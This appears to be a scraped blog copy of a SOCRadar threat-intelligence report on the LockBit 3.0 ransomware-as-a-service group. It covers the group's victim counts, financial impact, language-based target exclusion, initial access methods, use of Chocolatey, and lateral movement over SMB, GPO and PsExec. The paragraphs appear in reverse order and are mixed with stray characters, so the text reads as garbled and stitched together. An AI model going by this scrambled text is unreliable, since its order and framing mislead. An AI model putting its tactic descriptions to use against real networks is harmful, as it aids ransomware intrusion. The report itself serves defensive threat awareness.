SOCRadar Attack Surface Management MITRE ATT&CK TTPsĮxecution Guardrails: Environmental Keying To prevent this, organizations can use SOCRadar’s Digital Risk Protection for brand protection, which proactively denies potential phishing campaigns that impersonate their domains. LockBit affiliates commonly use phishing campaigns to gain initial access to their ransomware attacks. The group’s targeting of many countries and sectors, and its efforts to increase the number of systems it can infect, also show that it poses a significant danger to all organizations. Moreover, there is a high probability that the number of victims and target pool will keep increasing, leading to a notable upsurge in LockBit attacks in the upcoming days, especially if they manage to become the first notable ransomware affecting IOS devices. In conclusion, LockBit 3.0 is a highly active and expanding Ransomware-as-a-Service (RaaS) group that has victimized thousands of organizations worldwide and employs various tactics, techniques, and procedures due to its wide number of affiliates. (Source: Australian Cyber Security Center) Conclusion It may also send encrypted host and bot information to a command and control server.Īn overview of a typical LockBit operation. After encryption, LockBit 3.0 drops a ransom note and changes the host’s wallpaper and icons to LockBit branding. Using the Server Message Block (SMB) protocol, it can also spread via Group Policy Objects and PsExec. LockBit 3.0 uses hardcoded credentials or compromised local accounts with elevated privileges to spread through a victim network. Using an open-source package installer known as Chocolatey to install and execute malicious payloads is a recurring feature in LockBit 3.0 attacks, likely employed to evade detection. LockBit 3.0 affiliates use diverse methods for initial access, including exploiting RDP, launching phishing campaigns, and exploiting vulnerabilities in public-facing applications. Provided cryptographic key decodes the ransomware’s executable to protect the encoded file uploaded to the target system. If LockBit affiliates lack access to the passwordless version of the ransomware, they must provide a password during execution. Once executed in a victim’s system, LockBit 3.0 affiliates can modify its behavior using additional arguments, such as lateral movement or safe mode. LockBit 3.0, a Ransomware-as-a-Service (RaaS), has several options for configuring its behavior during compilation. Top targeted industries by LockBit 3.0 Findings on LockBit 3.0 Ransomware According to SOCRadar data, about half of the attacks with the LockBit 3.0 variant affect US companies. Some of the languages that are excluded are Romanian (Moldova), Arabic (Syria), and Tatar (Russia), but this is not an exhaustive list.Īlthough the ransomware group claims not to engage in politics, many of its targets appear to be NATO and allied countries. It cross-checks the result against a set of countries, and in case the locale doesn’t match any of the specified countries, the malware proceeds to the subsequent verification step. To confirm the location of the targeted system, LockBit ransomware employs the functions: Excluded languages include the local language of Russian-influenced countries and the languages of Russian-allied countries. LockBit 3.0 infects the target system if it is not on the exclusion list of specific languages. LockBit discloses its victims on its leak site and sets a deadline for the ransom. Even if these astronomical numbers could vary from company to company, the total financial loss caused by LockBit’s malicious acts can exceed billions of dollars. $34.8 million was due to revenue loss, and $7.3 million was mitigation expenses. The group, which has over 1500 victim announcement records on the SOCRadar platform, broke the record in the first quarter of 2023 as the most active ransomware group by far, with over 300 announced victims.Ītento, a CRM company, showed the impact of an attack by LockBit as $42.1 million in its financial performance report published in 2021. LockBit Ransomware Group was first observed in September 2019, it became the most active ransomware group of 2022 with the shutdown of Conti, and as of the first quarter of 2023, they still stand out as the most active ransomware group. A single group, the LockBit Ransomware Group, is accountable for over one-third of all ransomware attacks in the latter half of the previous year, the initial quarter of 2023. The frequency of ransomware attacks is on the rise every year.
0 Comments
Leave a Reply. |